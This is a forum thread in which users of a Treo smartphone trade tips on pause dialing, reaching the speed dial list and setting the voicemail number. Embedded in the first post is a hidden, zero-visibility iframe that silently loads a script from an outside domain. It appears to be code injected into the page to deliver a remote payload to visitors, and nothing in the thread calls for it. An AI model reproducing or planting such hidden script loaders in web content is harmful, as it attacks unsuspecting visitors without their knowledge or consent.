+ Reply to Thread

Thread: speed dialing

speed dialing

love the phone so far. two things:

-- anyone figure out how to do pause dialing (e.g. for user name and password for accessing voicemail)?

-- anyone know how to quickly get to the speed dial list -- without going through the palm menu (clunky and difficult)

Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The first one has been answered several times. Use a comma for a soft pause (use more than one if you need a longer pause) and a % for a hard pause. To release the hard pause after it's dialed, you hit the ok button.

Your second question: In phone mode, scroll down to Address Book, hit OK, scroll down to View Speed Dial List, hit OK.

To answer the next question you will have...To change the voicemail number that gets dialed by pressing the #1 speed dial, go to the Message app, either through palm or the phone menu. Tap on the menu soft button and under settings go to Voice Mail. You can edit the number there to add the # and pauses to access your voice mail. Another tip is to put your phone number in there instead of *86 so you can get to your messages even if roaming.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Thank you, Nick. Very helpful. I was hoping to be able to set up some kind of shortcut to the speed dial list. But I've been using voice dialing and that works very well so it's no big deal. Great forum!

Originally posted by tmwebsites
    The first one has been answered several times. Use a comma for a soft pause (use more than one if you need a longer pause) and a % for a hard pause. To release the hard pause after it's dialed, you hit the ok button.

Your second question: In phone mode, scroll down to Address Book, hit OK, scroll down to View Speed Dial List, hit OK.

To answer the next question you will have...To change the voicemail number that gets dialed by pressing the #1 speed dial, go to the Message app, either through palm or the phone menu. Tap on the menu soft button and under settings go to Voice Mail. You can edit the number there to add the # and pauses to access your voice mail. Another tip is to put your phone number in there instead of *86 so you can get to your messages even if roaming.

I put the speed dial icon in its own menu (I named mine "priority") on the palm..that way its quicker to get to.

Speed and Voice Dial Gone

Thanks to all. Now there's a new problem. See new thread:

http://www.smartphonesource.com/vbul...&threadid=7489